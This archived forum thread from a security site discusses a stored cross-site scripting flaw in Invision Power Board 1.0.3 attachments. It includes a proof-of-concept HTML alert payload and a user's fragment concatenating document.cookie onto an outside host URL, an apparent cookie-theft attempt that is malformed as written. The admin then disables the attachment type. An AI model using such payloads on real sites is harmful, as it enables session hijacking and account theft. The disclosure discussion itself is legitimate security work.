Articles

Metasploit Framework Windows Tutorial
Remote Desktop Connection
Windows Processes That May Be Dangerous
How-To use NetCat a Tutorial
Common Linux Commands
Common Ports
Netcat Commands
HTTP Response Codes
War-Google Hack Terms
Wardriving
Avoiding Social Engineering and Phishing Attacks
Intrusion Detection on Linux
Linux Intrusion Detection
Penetration Testing Guide
Penetration Testing Tools
Social Engineering Fundamentals, Part I: Hacker Tactics
Social engineering (computer security)
The Psychology of Social Engineering

The Archives

General GSO
GovernmentSecurity.org News & Suggestions
In The News
Open Topic
General Security Information
Trash Can
Exploit & Vulnerability Mailing List Archives
Trial Member Forum
Product and Program Reviews GSO Tutorials
System Security
Windows Systems
Beginners Section
Linux & Unix Systems
File Downloads
Exploit Research & Discussion Trojan & Virus Errata
Networking Security / Firewall / IDS / VPN / Routers
System Hardening
E-Mail Security
Wifi Security
Trial Member Uploads
Upload discovered Trojans & Mal ware
GSO Programming Section
C , C++ , VC++
Visual Basic.NET
Perl /CGI
Java/Javascript
PHP/XML/ASP/HTML
Assembly + Other
The Cork Board
Network Security Consultant Directory
Network Security Jobs
The Archives
Encryption Information
General Network Security
Internet Anonymity
HTTP Protocol Security
Linux Security
MS IIS Information
Exploit Articles
Programming / Tool Design
GSO Software Projects
Public Downloads
Microsoft Security Questions and Papers

JustAsFire
QUOTE
the css found when you uploading a file to the server by the "atteched file" function..

in ipb you can upload some HTML file,in the html file write this:
CODE

<html>

<body>

<script>alert('Css found By V[i]RuS');</script>

</body>

</html>

when someone will click on the attechment file the script will run.

sry about my poor english..

bug discoverd V[i]RuS

tested succesfully on ipb 1.0.3 all the vers should be vuln =]
Axl
Bip =]
JustAsFire
should I remove this till gsecur denies the .htm .html and .shtml attachments?
Axl
no, i dont think you should

this is now public,and this is a security board,your post is security related
so i think it should stay,anyway its not a critical sql injection vuln is it ?!
JustAsFire
I think it could get your cookie.
Axl
sure it can
usch
that trick doesn't work with firefox. only with IE


usch
brOmstar
I use the latest firefox and it works, open the attachment and a javascript alert box will be opened.

@usch this has nothing todo with the browser, as long as the browser knows javascript it will work. You download a html file with javascript inside and execute it on your browser so it doesn't depend on the browser. The bug here is that you can inject javascript code into the attachment.
apoc_neo
This can be avoided, just simply disable javascript in internet explorer or mozilla
lobas
how can we use this malicously



<body>

<script>'http://host.info:80/'+document.cookie;</script>

</body>

</html>


usch
what do you mean with maliciously ?

usch
lobas
steal cookies?
M3X!C4N
Learn javascript and then you will find out
lobas
i actually know how to do it but im not setting uo test forum

do u even know ur self or u being smart comment boy
M3X!C4N
Woah sory there I though you were just asking what the script was to steal a cookie
Booster2ooo
Should be interessting but I don't know even how to attach a file on IPB ... never found the button
JustAsFire
QUOTE(Booster2ooo @ Aug 8 2005, 07:28 AM)
Should be interessting but I don't know even how to attach a file on IPB ... never found the button
*


at least you're honest biggrin.gif
Booster2ooo
Used to use vbb, donno well IPB, and, really, i don't know how to do this shit, somebody can explian to me ? ( year year ... noob, but i don't find any way were are the attachement case or button)
GSecur
Attachment type disabled.
tweakz20
Just to let you know, 2.0 onwards is not vulnerable.
Tiago2
Interesting. Tried it aswell with the only javascript i know. alert(document.cookie).
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2005 Invision Power Services, Inc.